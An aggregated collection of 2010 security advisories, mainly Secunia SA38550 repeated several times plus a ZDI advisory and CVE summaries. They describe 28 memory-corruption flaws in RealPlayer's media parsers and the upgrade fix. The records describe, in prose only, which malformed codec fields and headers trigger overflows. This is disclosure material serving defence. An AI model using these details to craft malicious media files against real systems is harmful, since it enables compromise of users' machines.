https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to have an unspecified impact via a crafted SIPR file. RealNetworks RealPlayer Is SIPR A heap overflow vulnerability exists.Details of the impact of this vulnerability are unknown. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. Remote attackers can use specially crafted SIPR files to cause unspecified effects. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Integer overflow in the pnen3260.dll module in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code via a crafted TIT2 atom in an AAC file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists in RealPlayer's pnen3260.dll module while parsing the TIT2 atom within AAC files. The code within this module does not account for a negative size during an allocation and later uses the value as unsigned within a copy loop. Real Networks RealPlayer is prone to an integer-overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ZDI-10-269: RealNetworks RealPlayer AAC TIT2 Atom Integer Overflow Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-269 December 10, 2010 -- CVE ID: CVE-2010-4397 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8279. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-06-25 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi . ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 does not properly initialize the number of channels, which allows attackers to obtain unspecified "memory access" via unknown vectors. Real Networks RealPlayer is prone to a memory-access vulnerability. Successful exploits may allow attackers to gain access to sensitive information, cause a denial-of-service condition or memory corruption. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a 